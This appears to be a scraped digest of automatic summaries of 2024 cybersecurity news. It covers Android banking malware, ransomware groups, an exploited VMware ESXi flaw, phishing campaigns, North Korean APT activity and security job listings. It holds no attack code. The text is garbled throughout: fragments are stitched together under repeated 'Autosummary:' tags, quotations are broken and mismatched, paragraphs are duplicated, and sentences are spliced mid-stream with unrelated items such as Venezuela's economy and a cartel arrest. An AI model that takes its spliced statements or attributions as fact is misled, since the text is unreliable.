It said it "observes miscreants moving their domains, which are already listed in the DBL, to Cloudflare to disguise the backend of their operation, be it spamvertized domains, phishing, or worse." "Autosummary:
Who Should Attend: Small and Medium Businesses: Get enterprise-level protection at an affordable price. "Autosummary:
BITSLOTH, which takes the form of a DLL file ("flengine.dll"), is loaded by means of DLL side-loading techniques by using a legitimate executable associated with Image-Line known as FL Studio ("fl.exe"). "Autosummary:
Kliushin was charged alongside four other Russian citizens, Ivan Ermakov (aka Ivan Yermakov, 35), Nikolai Rumiantcev (aka Nikolay Rumyantsev, 33), Mikhail Vladimirovich Irzak (aka Mikka Irzak, 43), and Igor Sergeevich Sladkov (42).Seleznev developed automated systems for systemic identity… pic.twitter.com/0P36EKtoMB — vx-underground (@vxunderground) August 1, 2024 In December 2017, the Russian hacker Roman Seleznev, aka Track2, Bulba and Ncux, was sentenced to 27 years in prison, he was convicted of causing $170 million in damage by hacking into point-of-sale systems. "Autosummary:
"Autosummary:
Avtech camera vulnerability actively exploited in the wild, CISA warns Pierluigi Paganini August 02, 2024 August 02, 2024 CISA warned that an Avtech camera vulnerability, which is still unpatched, is being actively exploited in the wild. "Autosummary:
After stealing their credentials, the threat actors hijack their accounts, take control of their pages, publish malicious social media posts, and promote them via paid advertising. "Autosummary:
As scammers almost always do, they try to impose a feeling of urgency on the target, making potential victims feel as though they must act quickly because of, say, an acute problem with their account. The scammer then offers to help the target to secure their funds, but to do so, the scammer—posing as a legitimate employee of the cryptocurrency exchange—first needs the victim’s log in credentials. "Autosummary:
"Autosummary:
Football fans warned over Premier League ticket scams Getty Images Thousands of young people in the UK were tricked into paying money for non-existent Premier League football tickets last season, according to an estimate by Lloyds Bank. "Autosummary:
"Nucleus Security has launched its Nucleus Vulnerability Intelligence Platform. Platform enables enterprises to aggregate, analyze, and act on insights from government, open-source, and premium threat intelligence feeds while reducing manual effort, accelerating threat assessment, and promoting proactive remediation. Vulnerability intelligence data is fragmented across multiple sources, from vendor security advisories to open-source projects, premium tools, and government databases, including CISA’s Known Exploited Vulnerabilities (KEV) catalog and National Vulnerability Database (NVD). As a result, threat and … More
The post Nucleus Vulnerability Intelligence Platform enhances threat assessment and remediation speed appeared first on Help Net Security.
"Autosummary:
Platform enables enterprises to aggregate, analyze, and act on insights from government, open-source, and premium threat intelligence feeds while reducing manual effort, accelerating threat assessment, and promoting proactive remediation. "Autosummary:
Once installed on the victim’s device, BingoMod leverages various permissions, including Accessibility Services, to quietly steal sensitive information, including credentials, SMS messages, and current account balances.BingoMod Android RAT steals money from victims’ bank accounts and wipes data Pierluigi Paganini August 01, 2024 August 01, 2024 BingoMod is a new Android malware that can wipe devices after stealing money from the victims’ bank accounts. "Autosummary:
"However, the DPAPI does not protect against malicious applications able to execute code as the logged in user – which info-stealers take advantage of." App-bound encryption is an improvement over DPAPI in that it interweaves an app"s identity (i.e., Chrome in this case) into encrypted data to prevent another app on the system from accessing it when decryption is attempted. "Autosummary:
Since the start of the year, it also warned of fake remote job ads being used to steal cryptocurrency from job seekers across the United States, and it cautioned against using unlicensed cryptocurrency transfer services, which can result in financial loss if law enforcement takes down these platforms. "Autosummary:
Image Dark Angels, having compromised a company"s security, decide whether to encrypt a business"s files and then, more often than not, spend days or even weeks exfiltrating vast amounts of data. "Autosummary:
"BingoMod belongs to the modern RAT generation of mobile malware, as its remote access capabilities allow threat actors (TAs) to conduct Account Takeover (ATO) directly from the infected device, thus exploiting the on-device fraud (ODF) technique," researchers Alessandro Strino and Simone Mattia said. "Autosummary:
Latest campaign In a report today, cybersecurity company Proofpoint says that it observed malware activity targeting law, finance, manufacturing, and technology organizations with malicious .LNK files hosted on the legitimate TryCloudflare domain. "Autosummary:
Promoted through Snapchat, Instagram, and Telegram, Russian Coms was available as a handset and later as a web app that could provide customers with encrypted calls, web phone, no logs, instant handset wipes, voice changing services, international calls, and 24/7 support. "Autosummary:
Although the U.S. DoJ announcement does not specify how these pop-ups appeared on the victims’ systems, common methods used include visiting compromised websites, malvertising campaigns, phishing emails, and pre-existing infections. "Autosummary:
“Exascale will help researchers model all aspects of the world, test scientific theories and improve products and services in areas such as artificial intelligence, drug discovery, climate change, astrophysics and advanced engineering,” it says on its website. "Cloud Security Architect Precisely | United Kingdom | Remote – View job details As a Cloud Security Architect, you will be responsible for the design and architecture of Precisely’s cloud security posture. Determine security requirements by evaluating business and product strategies, researching cloud security standards and new technologies, conducting system security and vulnerability analyses and performing risk assessments. Cybersecurity Engineer Electrolux Group | Italy | On-site – View job details As a Cybersecurity Engineer, you … More
The post Cybersecurity jobs available right now: July 31, 2024 appeared first on Help Net Security.
"Autosummary:
Senior Cyber Security Expert TECNIMONT | Italy | On-site – View job details As a Senior Cyber Security Expert, you will manage key cybersecurity solutions, including AV/EDR, SIEM, Zero Trust, Network Detection & Response, WAF, VA/PT both infrastructure and application, and DLP. Information Security Specialist (Cloud Security) Vertiv | Philippines | On-site – View job details As an Information Security Specialist (Cloud Security), you will design, deploy, and manage our cloud-based SIEM platform, ensuring comprehensive visibility into security events, alerts, and logs across all cloud services and applications. MDDR Manager Varonis | USA | On-site – View job details As an MDDR Manager, you will assist in the development, documentation, analysis, testing, and modification of Varonis’ threat detection systems, playbooks, runbooks, and MDDR team operations. Junior IT and Security Compliance Specialist Covercy | Israel | Hybrid – View job details As a Junior IT and Security Compliance Specialist, you will manage IT infrastructure for optimal performance and security, support network security, data protection, and system monitoring. Cyber Security Analyst Century Aluminum | USA | On-site – View job details The role of the Cyber Security Analyst responsibilities include monitoring, identifying, and resolving any risks or vulnerabilities to safeguard Century’s information technology network, applications, and systems from external and internal cyber security threats. "Modern software applications usually consist of numerous files and several million lines of code. Due to the sheer quantity, finding and correcting faults, known as debugging, is difficult. In many software companies, developers still search for faults manually, which takes up a large proportion of their working time. Studies indicate that this accounts for between 30 and 90 percent of the total development time. Birgit Hofer and Thomas Hirsch from the Institute of Software Technology … More
The post Innovative approach promises faster bug fixes appeared first on Help Net Security.
"Autosummary:
Based on this bug report, the combination of natural language processing and metrics analyses the entire code about classes, the names of variables, files, methods or functions, and the calls to methods and functions. "Autosummary:
Israeli cybersecurity company Cybereason is tracking the campaign under the name Cuckoo Spear, attributing it as related to a known intrusion set dubbed APT10, which is also known as Bronze Riverside, ChessMaster, Cicada, Cloudhopper, MenuPass, MirrorFace, Purple Typhoon (formerly Potassium), and Stone Panda. "Autosummary:
" Victims of the campaign have been detected in 113 countries, with India and Russia topping the list, followed by Brazil, Mexico, the U.S., Ukraine, Spain, and Turkey. "Autosummary:
Phishing campaigns target SMBs in Poland, Romania, and Italy with multiple malware families Pierluigi Paganini July 31, 2024 July 31, 2024 Phishing campaigns target small and medium-sized businesses (SMBs) in Poland to deliver malware families such as Agent Tesla, Formbook, and Remcos RAT. "Autosummary:
BingoMod details Researchers at Cleafy, an online fraud management and prevention solution, found that BingoMod is distributed in smishing (SMS phishing) campaigns and uses various names that typically indicate a mobile security tool (e.g. APP Protection, Antivirus Cleanup, Chrome Update, InfoWeb, SicurezzaWeb, WebSecurity, WebsInfo, WebInfo, and APKAppScudo). "Zimperium’s zLabs team has uncovered a new and widespread threat dubbed SMS Stealer. Detected during routine malware analysis, this malicious software has been found in over 105,000 samples, affecting more than 600 global brands. SMS Stealer’s extensive reach poses significant risks, including account takeovers and identity theft. The SMS Stealer threat, first identified in 2022, uses fake ads and Telegram bots posing as legitimate services to trick victims into gaining access to their SMS messages. … More
The post SMS Stealer malware targeting Android users: Over 105,000 samples identified appeared first on Help Net Security.
"Autosummary:
Once access is granted, the malware connects to one of its 13 Command and Control (C&C) servers, confirms its status, and transmits stolen SMS messages, including one-time passwords (OTPs). "Autosummary:
"Autosummary:
The organization plays a critical role in ensuring a stable blood supply to the Southeastern part of the country, collecting, testing, and distributing a large volume of blood products. "Autosummary:
The malicious site spreading DeerStealer Source: Malwarebytes The sample Malwarebytes downloaded is signed by "Songyuan Meiying Electronic Products Co., Ltd." one day before the download, but ANY.RUN previously got a payload signed by "Reedcode Ltd." Valid signatures on different samples of the malware Source: Malwarebytes, ANY.RUN The valid signature gives the file credibility on Windows, potentially bypassing security solutions and allowing it to run on the victim"s device without warnings. "Autosummary:
"Autosummary:
A ransomware attack disrupted operations at OneBlood blood bank Pierluigi Paganini July 31, 2024 July 31, 2024 OneBlood, a non-profit blood bank serving over 300 U.S. hospitals, suffered a ransomware attack that disrupted its medical operations. "Autosummary:
"Autosummary:
" The campaign has been observed targeting users in the U.S., South Korea, Germany, India, Ireland, Italy, Norway, and the U.K. The disclosure builds upon similar findings from ReliaQuest, Proofpoint, and McAfee Labs, indicating that phishing attacks employing this technique – also tracked as ClickFix – are becoming increasingly prevalent. "Autosummary:
"VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named "ESX Admins" to have full administrative access by default," researchers Danielle Kuznets Nohi, Edan Zwick, Meitar Pinto, Charles-Edouard Bettan, and Vaibhav Deshmukh said. "IBM released its annual Cost of a Data Breach Report revealing the global average cost of a data breach reached $4.88 million in 2024, as breaches grow more disruptive and further expand demands on cyber teams. Breach costs increased 10% from the prior year, the largest yearly jump since the pandemic, as 70% of breached organizations reported that the breach caused significant or very significant disruption. Lost business and post-breach customer and third-party response costs … More
The post Average data breach cost jumps to $4.88 million, collateral damage increased appeared first on Help Net Security.
"Autosummary:
Data insecurities fuel intellectual property theft According to the 2024 Cost of a Data Breach Report, 40% of breaches involved data stored across multiple environments and more than one-third of breaches involved shadow data (data stored in unmanaged data sources), highlighting the growing challenge with tracking and safeguarding data.Organizations also plan to invest in incident response planning and testing, threat detection and response technologies (e.g., SIEM, SOAR and EDR), identity and access management and data security protection tools. "Ransomware operators have been leveraging CVE-2024-37085, an authentication bypass vulnerability affecting Active Directory domain-joined VMware ESXi hypervisors, to gain full administrative access to them and encrypt their file system. VMware owner Broadcom has released a fix for CVE-2024-37085 on June 25, 2024 and credited Microsoft’s researchers for flagging it, but did not mention that the vulnerability – at that time, a zero-day – was under active exploitation. Attackers exploiting CVE-2024-37085 “ESXi is a bare-metal hypervisor … More
The post VMware ESXi auth bypass zero-day exploited by ransomware operators (CVE-2024-37085) appeared first on Help Net Security.
"Autosummary:
Ransomware operators have been using custom Linux versions of the Akira, Black Basta, Babuk, Lockbit, and other encryptors to encrypt VMware ESXi virtual machines, but leveraging ESXi vulnerabilities such as CVE-2024-37085 means easy encryption of multiple virtual machines (VMs) in one fell swoop. "Autosummary:
Regardless of what malware is deployed, Agent Tesla, Formbook, and Remcos RAT come with capabilities to siphon sensitive information, allowing the threat actors to "prepare the ground for their next campaigns. "Autosummary:
Click here to learn more Take a guided tour of the underground Because the dark web is a hub for cybercriminals to exchange tools, information, and services, dark web threat intelligence is crucial for companies, as it offers an uncensored view into the current cybercrime landscape and trends. "Autosummary:
Subsequently, it downloads an archive file into this location, renames it, extracts its contents (“script.a3x” and “AutoIt3.exe”), and executes script.a3x using AutoIt3.exe. "Autosummary:
DigiCert is one of the prominent certificate authorities (CAs) that provides SSL/TLS certificates, including Domain Validated (DV), Organization Validated (OV), and Extended Validation (EV) certificates. "Autosummary:
Get a snapshot of your password vulnerabilities today Specops Password Auditor is a free read-only auditing tool that helps IT teams proactively identify password vulnerabilities in their organization’s Active Directory. User-driven password reset requests Tracking how often users are resetting their passwords can help identify weak spots in your security system or faulty authentication protocols. Regular scans of your Active Directory with an auditing tool should show a reduction or complete elimination of end user accounts with no password, expired passwords, or identical password to other users. "Autosummary:
SideWinder (also known as Razor Tiger, Rattlesnake, and T-APT-04) has been active since at least 2012, the group mainly targeted Police, Military, Maritime, and the Naval forces of Central Asian countries.In the 2022 attacks, the threat actors also targeted departments of Foreign Affairs, Scientific and Defence organisations, Aviation, IT industry, and Legal firms. "Autosummary:
"In early 2024, ThreatLabz uncovered a victim who paid Dark Angels $75 million, higher than any publicly known amount— an achievement that"s bound to attract the interest of other attackers looking to replicate such success by adopting their key tactics (which we describe below)," reads the 2024 Zscaler Ransomware Report. "Autosummary:
"Autosummary:
Moreover, Mandiant, who tracks the threat actors as UNC4393, has identified new malware and tools used in Black Basta intrusions, demonstrating evolution and resilience. "Autosummary:
"Autosummary:
The mayor"s statement published on June 23, 2024 Email services and IT connectivity between public agencies were rendered unavailable, but the 911 and 311 lines and all public safety and emergency services continued to operate as usual. "Autosummary:
"In early 2024, ThreatLabz uncovered a victim who paid Dark Angels $75 million, higher than any publicly known amount— an achievement that"s bound to attract the interest of other attackers looking to replicate such success by adopting their key tactics (which we describe below)," reads the 2024 Zscaler Ransomware Report. "Autosummary:
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added an authentication bypass VMware ESXi vulnerability, tracked as CVE-2024-37085 (CVSS score of 6.8), to its Known Exploited Vulnerabilities (KEV) catalog. "Autosummary:
Example of a phishing email containing ModiLoader in the attachment In other campaigns, email messages were more verbose, such as the phishing email in Figure 3, which can be translated as follows: Hi, We are looking to purchase your product for our client.The final payload to be delivered and launched on the compromised machines varied; we’ve detected campaigns delivering: Formbook – information stealing malware discovered in 2016, Agent Tesla – a remote access trojan and information stealer, and Rescoms RAT – remote control and surveillance software, able to steal sensitive information.Chain of compromise of ModiLoader phishing campaigns in Poland during May 2024 Data exfiltration Three different malware families were used as a final payload: Agent Tesla, Rescoms, and Formbook. Overview Even though the phishing campaigns have been ongoing throughout the first half of 2024, this blogpost focuses just on May 2024, as this was an eventful month. In the other case, when a RAR archive was sent as an attachment, the content was a heavily obfuscated batch script, with the same name as the archive and with the .cmd file extension. Key points of this blogpost: ESET detected nine notable ModiLoader phishing campaigns during May 2024 in Poland, Romania, and Italy.A more verbose phishing email example containing ModiLoader in the attachment As in the phishing campaigns of H2 2023, attackers impersonated existing companies and their employees as the technique of choice to increase campaign success rate. "This article includes excerpts from recent reports we covered, providing statistics and insights into the levels of stress and burnout experienced by cybersecurity professionals. Most cybersecurity pros took time off due to mental health issues Hack The Box | Building a firewall against cybersecurity burnout | June 2024 74% of cybersecurity professionals globally say that they have taken time off due to work-related mental well-being problems, with staff reporting taking an average of 3.4 sick … More
The post The cost of cybersecurity burnout: Impact on performance and well-being appeared first on Help Net Security.
"Autosummary:
Proofpoint | 2024 Voice of the CISO | May 2024 In 2024, 53% of CISOs admitted to burnout compared to 60% last year, while 66% feel they face excessive expectations, a steady increase from 61% last year and 49% in 2022. "Autosummary:
" Some of the malware families propagated using this method include Atlantida Stealer, Rhadamanthys, RisePro, Lumma Stealer, and RedLine, with the bogus accounts also engaged in starring, forking, watching, and subscribing to malicious repositories to give them a veneer of legitimacy. It"s however worth noting that these are intentional design decisions taken by GitHub, as noted by the company in its own documentation - Commits to any repository in a fork network can be accessed from any repository in the same fork network, including the upstream repository When you change a private repository to public, all the commits in that repository, including any commits made in the repositories it was forked into, will be visible to everyone. "Autosummary:
"Gh0st RAT is written in C++ and has many features, including terminating processes, removing files, capturing audio and screenshots, remote command execution, keylogging, data exfiltration, hiding registry, files, and directories via the rootkit capabilities, and many more," eSentire said. "Autosummary:
"Autosummary:
"Autosummary:
Sample email from the campaign Source: Guardio Labs Proofpoint tightens security In a coordinated report from Proofpoint, the company says they had been monitoring this campaign since March, With the technical IOCs shared by Guardio, Proofpoint was further able to mitigate these attacks and provide new settings and advice on how to prevent them in the future. "CVE-2023-45249, a critical vulnerability affecting older versions of Acronis Cyber Infrastructure, is being exploited by attackers. About Acronis Cyber Infrastructure Acronis is a privately held Swiss cybersecurity and data protection technology company. Acronis Cyber Infrastructure (ACI) is an IT infrastructure solution that provides storage, compute, and network resources. Businesses and service providers use it for data storage, backup storage, creating and managing virtual machines and software-defined networks, running cloud-native applications in production environments, and more. … More
The post Critical Acronis Cyber Infrastructure vulnerability exploited in the wild (CVE-2023-45249) appeared first on Help Net Security.
"Autosummary:
Version 5.0 before build 5.0.1-61 Version 5.1 before build 5.1.1-71 Version 5.2 before build 5.2.1-69 Version 5.3 before build 5.3.1-53, and Version 5.4 before build 5.4.4-132 Upgrade ASAP "Autosummary:
The technique, which involves the threat actor sending the messages from an SMTP server on a virtual private server (VPS), is notable for the fact that it complies with authentication and security measures such as SPF and DKIM, which are short for Sender Policy Framework and DomainKeys Identified Mail, respectively, and refer to authentication methods that are designed to prevent attackers from imitating a legitimate domain. "The spammer used a rotating series of leased virtual private servers (VPS) from several providers, using many different IP addresses to initiate quick bursts of thousands of messages at a time from their SMTP servers, sent to Microsoft 365 to be relayed to Proofpoint-hosted customer servers," Proofpoint said. "Autosummary:
Affected products include: Acronis Cyber Infrastructure (ACI) before build 5.4.4-132 Acronis Cyber Infrastructure (ACI) before build 5.0.1-61 Acronis Cyber Infrastructure (ACI) before build 5.1.1-71 Acronis Cyber Infrastructure (ACI) before build 5.2.1-69 Acronis Cyber Infrastructure (ACI) before build 5.3.1-53 The company addressed the vulnerability with the release of ACI versions 5.4 update 4.2, 5.2 update 1.3, 5.3 update 1.3, 5.0 update 1.4, and 5.1 update 1.2. "Autosummary:
"A malicious actor with sufficient Active Directory (AD) permissions can gain full access to an ESXi host that was previously configured to use AD for user management by re-creating the configured AD group ("ESXi Admins" by default) after it was deleted from AD," Broadcom explains. "Autosummary:
"Autosummary:
Ransomware gangs exploit recently patched VMware ESXi bug CVE-2024-37085 Pierluigi Paganini July 29, 2024 July 29, 2024 Microsoft warns that ransomware gangs are exploiting the recently patched CVE-2024-37085 flaw in VMware ESXi flaw. "Autosummary:
As we explained here, we fall for these tricks because: We’re in a hurry, especially if we’re viewing the content on our mobile device They’re good storytellers, and are increasingly fluent, using (ironically) GenAI to tell their stories seamlessly in multiple languages We love to get something for nothing, even if it’s too good to be true The bad guys are good at sharing knowledge on what works and what doesn’t, while we’re less good at seeking out or taking advice We’re hardwired to respect authority, or at least the legitimacy of an offer, as long as it’s “officially” branded When it comes to GenAI, malware-slingers are getting increasingly sophisticated.They could use access to steal your most sensitive personal and financial information, or turn your machine into a “zombie” computer to launch attacks on others They could use your personal information for identity fraud which can be extremely distressing, not to mention expensive, for the victim They could use financial and identity details to obtain new credit lines in your name, or to steal crypto assets and access and drain bank accounts They could even use your work credentials to launch an attack on your employer, or a partner/supplier organization.It could include credentials for your online accounts, such as work log-ins, or stored credit cards, session cookies (to bypass multifactor authentication), assets stored in crypto wallets, data streams from instant messaging apps, and much more. Be wary of clicking on digital ads Digital ads, especially on social media platforms like Facebook, can be a common vector for distributing malicious apps.It’s, therefore, key to understand how they work, learn to spot the warning signs, and take precautions so that your identity and finances aren’t at risk. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Microsoft releases tool to speed up recovery of systems borked by CrowdStrike update By now, most people are aware of – or have been personally affected by – the largest IT outage the world have ever witnessed, courtesy of a defective update for Crowdstrike Falcon Sensors that threw Windows hosts into a blue-screen-of-death (BSOD) loop. Vulnerability in Telegram app for … More
The post Week in review: CrowdStrike-triggered outage insights, recovery, and measuring cybersecurity ROI appeared first on Help Net Security.
"Autosummary:
Confidential AI: Enabling secure processing of sensitive data In this Help Net Security interview, Anand Pashupathy, VP & GM, Security Software & Services Division at Intel, explains how Intel’s approach to confidential computing, particularly at the silicon level, enhances data protection for AI applications and how collaborations with technology leaders like Google Cloud, Microsoft, and Nvidia contribute to the security of AI solutions.Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Microsoft releases tool to speed up recovery of systems borked by CrowdStrike update By now, most people are aware of – or have been personally affected by – the largest IT outage the world have ever witnessed, courtesy of a defective update for Crowdstrike Falcon Sensors that threw Windows hosts into a blue-screen-of-death (BSOD) loop. "Autosummary:
Unfortunately, however, those policies have done little or nothing to tackle the economy"s underlying structural problems - chiefly, its historic dependence on oil, to the detriment of other sectors.But at the same time, they neglected to invest in maintaining the level of oil production, which has plummeted in recent years - partly, but not solely, as a result of US sanctions. "Autosummary:
"Autosummary:
The PlugX malware is a remote access trojan (RAT) that has been used since 2008 by multiple China-linked APT groups, including Mustang Panda, Winnti, and APT41 The RAT uses DLL side-loading to load its own malicious payload malicious DLL when a digitally signed software application, such as the x32dbg debugging tool (x32dbg.exe), is executed. "Autosummary:
French judicial authorities, in collaboration with Europol, have launched a so-called "disinfection operation" to rid compromised hosts of a known malware called PlugX. The Paris Prosecutor"s Office, Parquet de Paris, said the initiative was launched on July 18 and that it"s expected to continue for "several months. "Autosummary:
The list of hacked Russian banks includes Dom.RF, VTB Bank, Alfa-Bank, Sberbank, Raiffeisen Bank, RSHB Bank, Rosbank, Gazprombank, Tinkoff Bank and iBank. "Autosummary:
Leader of Mexico"s Sinaloa drug cartel arrested in Texas DEA/ICE Ismael "El Mayo" Zambada (left) and Joaquin Guzman Lopez One of the world"s biggest drug lords, Ismael "El Mayo" Zambada, leader of Mexico"s Sinaloa cartel, has been arrested by US federal agents in El Paso, Texas. "As AI-generated deepfake attacks and identity fraud become more prevalent, companies are developing response plans to address these threats, according to GetApp. In fact, 73% of US respondents report that their organization has developed a deepfake response plan. This concern stems from the growing sophistication of AI-driven impersonation attacks that can undermine traditional security measures like biometric authentication, which were previously considered highly secure but are now being called into question. Companies are developing deepfake … More
The post AI-generated deepfake attacks force companies to reassess cybersecurity appeared first on Help Net Security.
"Autosummary:
Companies are developing deepfake response plans Also, much like phishing attack preparation, it appears that companies are looking to run simulations of attacks to increase preparedness as a majority of respondents work in companies where this is already implemented. "Autosummary:
"Unbeknownst to most users, Selenium WebDriver API enables full interaction with the machine itself, including reading and downloading files, and running remote commands," Wiz researchers Avigayil Mechtinger, Gili Tikochinski, and Dor Laska said. "Autosummary:
A ZIP file ("CrowdStrike Falcon.zip") that contains a Python-based information stealer tracked as Connecio that collects system information, external IP address, and data from various web browsers, and exfiltrates them to SMTP accounts listed on a Pastebin dead-drop URL. "Autosummary:
According to experts, one of the key issues is tracking high-risk individuals who may misuse financial services, such as banks, e-commerce platforms, and payment networks, to engage in illegal activities, including money laundering and terrorism financing. "Autosummary:
Plato"s adage, "Necessity is the mother of invention," is an apt characterization of cybersecurity today, where new AI-driven threats drive the innovation of more advanced security controls.While unconfirmed, it is believed that Ray Thomlinson, famously known for inventing email, developed Reaper, a program designed to remove Creeper from Infected Machines. "Autosummary:
A Go-based backdoor that can run an arbitrary file, list contents of a directory, download a file, take screenshots, and launch a shell to execute arbitrary commands Dora RAT - A "simple malware strain" with support for reverse shell and file download/upload capabilities "They have evolved from targeting South Korean financial institutions with disruptive attacks to targeting U.S. healthcare with ransomware, known as Maui, although not at the same scale as other Russian speaking cybercrime groups," Alex Rose, director of threat research and government partnerships at Secureworks Counter Threat Unit, said. "Autosummary:
The vulnerability impacts BIND 9 versions 9.0.0 through 9.11.37, 9.16.0 through 9.16.50, 9.18.0 through 9.18.27, 9.19.0 through 9.19.24, 9.9.3-S1 through 9.11.37-S1, 9.16.8-S1 through 9.16.49-S1, and 9.18.11-S1 through 9.18.27-S1 A performance issue in BIND 9, tracked as CVE-2024-1737, can occur when resolver caches or authoritative zone databases contain many resource records (RRs) for the same hostname. "Autosummary:
In 2023, the largest players in this space included LockBit, Black Basta, ALPHV/BlackCat, Cl0p, PLAY, and Akira, all run by Russian-speaking threat actors. "Autosummary:
Targets of the campaign include users of Spanish financial institutions, as well as tax and governmental services, e-commerce, banks, and cryptocurrency exchanges in the United States, the United Kingdom, Slovakia, and Brazil. "Autosummary:
"Autosummary:
"While an interim workaround was provided during the incident, after the fix was fully rolled out, users are being advised to restart their Chrome browser to ensure that the fix takes effect," Google added. "Autosummary:
"Autosummary:
A bug in Chrome Password Manager caused user credentials to disappear Pierluigi Paganini July 26, 2024 July 26, 2024 Google addressed a Chrome’s Password Manager bug that caused user credentials to disappear temporarily for more than 18 hours. "Autosummary:
"GitHub is an immensely popular platform, with over 100 million developers and over 90% of Fortune 100 companies utilizing it. Despite its widespread use, many GitHub Actions workflows remain insecure, often due to excessive privileges or high-risk dependencies. In this Help Net Security video, Roy Blit, Head of Research at Legit Security, discusses a new Legit Security State of GitHub Actions Security report. The report unveils an especially concerning security posture and reveals that most … More
The post Researchers expose GitHub Actions workflows as risky and exploitable appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The compromised data includes names, medical record numbers, addresses, dates of birth, diagnostic and treatment information, and health insurance details. "Autosummary:
"Autosummary:
Meta attributed the second cluster to a cybercrime group tracked as Yahoo Boys, which came under the radar earlier this year for orchestrating financial sextortion attacks targeting teenagers from Australia, Canada, and the U.S. A subsequent report from Bloomberg exposed sextortion-fueled suicides, revealing how scammers are posing as teenage girls on Instagram and Snapchat to lure targets and entice them into sending explicit photos, which are then used to blackmail victims in exchange for money or risk getting their images forwarded to their friends. "Autosummary:
"An attacker could escalate their privileges to the Default Cloud Build Service Account and access numerous services such as Cloud Build, storage (including the source code of other functions), artifact registry and container registry," the exposure management company said in a statement. "Autosummary:
Hackers exploit Microsoft Defender SmartScreen bug CVE-2024-21412 to deliver ACR, Lumma, and Meduza Stealers Pierluigi Paganini July 25, 2024 July 25, 2024 The CVE-2024-21412 flaw in the Microsoft Defender SmartScreen has been exploited to deliver information stealers such as ACR Stealer, Lumma, and Meduza.This code retrieves necessary APIs, creates a folder, and drops files in the “%TEMP%” directory, including a HijackLoader, indicated by specific byte patterns in the data. "Autosummary:
More recently, security researchers developed and released a proof-of-concept (PoC) exploit targeting remote code execution on Telerik Report servers by chaining a critical authentication bypass flaw (CVE-2024-4358) and a high-severity RCE (CVE-2024-1800). "Autosummary:
"Given the potential legal challenges that could arise from conducting a widespread disinfection campaign, which involves sending an arbitrary command to workstations we do not own, we have resolved to defer the decision on whether to disinfect workstations in their respective countries to the discretion of national Computer Emergency Response Teams (CERTs), Law Enforcement Agencies (LEAs), and cybersecurity authorities," explained Sekoia in their April report. "Autosummary:
Activating All-in-One advantages By consolidating tools, automating tasks, and enhancing efficiency, the All-in-One approach to cybersecurity empowers MSPs to maximize their margins.Cynet’s All-in-One Cybersecurity Platform, on the other hand, a purpose-built unified full suite of security capabilities on a single, simple platform. "Autosummary:
ESXi is a popular choice with cloud providers and data centres that have a require to host thousands of virtual machines for their customers, but there are also use cases in healthcare, finance, education, and other sectors.Files related to virtual machines, such as virtual disks, storage, and backup images, are targeted. "Autosummary:
"APT45 is a long-running, moderately sophisticated North Korean cyber operator that has carried out espionage campaigns as early as 2009," researchers Taylor Long, Jeff Johnson, Alice Revelli, Fred Plan, and Michael Barnhart said. "Autosummary:
"Autosummary:
" "The information targeted—such as contract specifications, bills of materials, project details, design drawings, and engineering documents—has military and civilian applications and leads the authoring agencies to assess one of the group"s chief responsibilities as satisfying collection requirements for Pyongyang"s nuclear and defense programs," the authoring agencies added. "Autosummary:
Below is the list of versions of Docker Engine that are impacted if the AuthZ plugin is used: <= v19.03.15 <= v20.10.27 <= v23.0.14 <= v24.0.9 <= v25.0.5 <= v26.0.2 <= v26.1.4 <= v27.0.3, and <= v27.1.0 Docker Engine v19.03.x and later versions are not affected if authorization plugins are not used for access control decisions. "Autosummary:
The UEFI device makers who used untrusted test keys across 813 products include Acer, Aopen, Dell, Formelife, Fujitsu, Gigabyte, HP, Intel, Lenovo, and Supermicro. "Autosummary:
This malicious activity was reported by Resecurity, which, after monitoring it for a week, identified multiple victims, including government agencies, data centers, energy providers, and software development firms. "Applied Cryptographer Quantstamp | EMEA | Remote – View job details As an Applied Cryptographer, you will research about various cryptographic protocols and have knowledge of cryptographic primitives or concepts, like elliptic curve cryptography, hash functions, and PCPs. You should have experience with at least one major language, like Rust, Python, Java, or C; the exact language is not too important. You should be familiar with versioning software (specifically, GitHub), testing, and a familiarity with … More
The post Cybersecurity jobs available right now: July 24, 2024 appeared first on Help Net Security.
"Autosummary:
Director of Information Security, Cyber Risk and Compliance S&P Global | Italy | On-site – View job details As a Director of Information Security, Cyber Risk and Compliance, you will become familiar with the Cyber Risk and Compliance team activities and Market Intelligence regarding SOC reporting, relevant regulatory requirements, control frameworks, internal and external audit processes, customer interactions including security questions and audits, and overall company and divisional cyber security processes and controls. Digital Forensics and Incident Response Analyst Accenture | Philippines | On-site – View job details As a Digital Forensics and Incident Response Analyst, you will perform incident response to cybersecurity incidents, including but not limited to APT & Nation State attacks, Ransomware infections and Malware outbreaks, Insider Threats, BEC, DDOS, Security and Data breach, etc. Senior CyberSecurity Architect Hexagon Geosystems | European Economic Area | Remote – View job details As a Senior CyberSecurity Architect, you will plan, organize, test, and document the implementation of new security systems and tools; define the success criteria and security requirements, and develop reference architecture, functional and non-functional requirements for proof-of-concept efforts and projects. (Senior) Information Security Officer Oetker Digital | Germany | Hybrid – View job details As a (Senior) Information Security Officer, you will develop, implement, and monitor a strategic, comprehensive company information security and IT risk management program, based on the Oetker Group-wide security directive. "In this Help Net Security interview, Karthik Swarnam, Chief Security and Trust Officer at ArmorCode, discusses key metrics and KPIs to measure cybersecurity ROI. Swarnam shares strategies for enhancing ROI through proactive measures and effective communication with executive leadership. What are the primary metrics and KPIs used to measure the ROI of cybersecurity investments? Today, cybersecurity investments are evaluated not just for cost avoidance but for a much broader range of benefits. These metrics include: … More
The post Cybersecurity ROI: Top metrics and KPIs appeared first on Help Net Security.
"Autosummary:
To improve cybersecurity ROI, security professionals should: Establish clear metrics: Define and measure key metrics across various domains such as identity & access management, risk remediation, software development, data loss prevention, and messaging security. Define and measure key metrics across various domains such as identity & access management, risk remediation, software development, data loss prevention, and messaging security.In this Help Net Security interview, Karthik Swarnam, Chief Security and Trust Officer at ArmorCode, discusses key metrics and KPIs to measure cybersecurity ROI. Tool rationalization: By leveraging a governance layer, organizations can eliminate redundant security tools, optimizing their security investments.Traditional metrics for this measurement include the number of detected incidents, Mean Time to Detect (MTTD), Mean Time to Respond (MTTR), and patch management (average time to deploy fixes). "Autosummary:
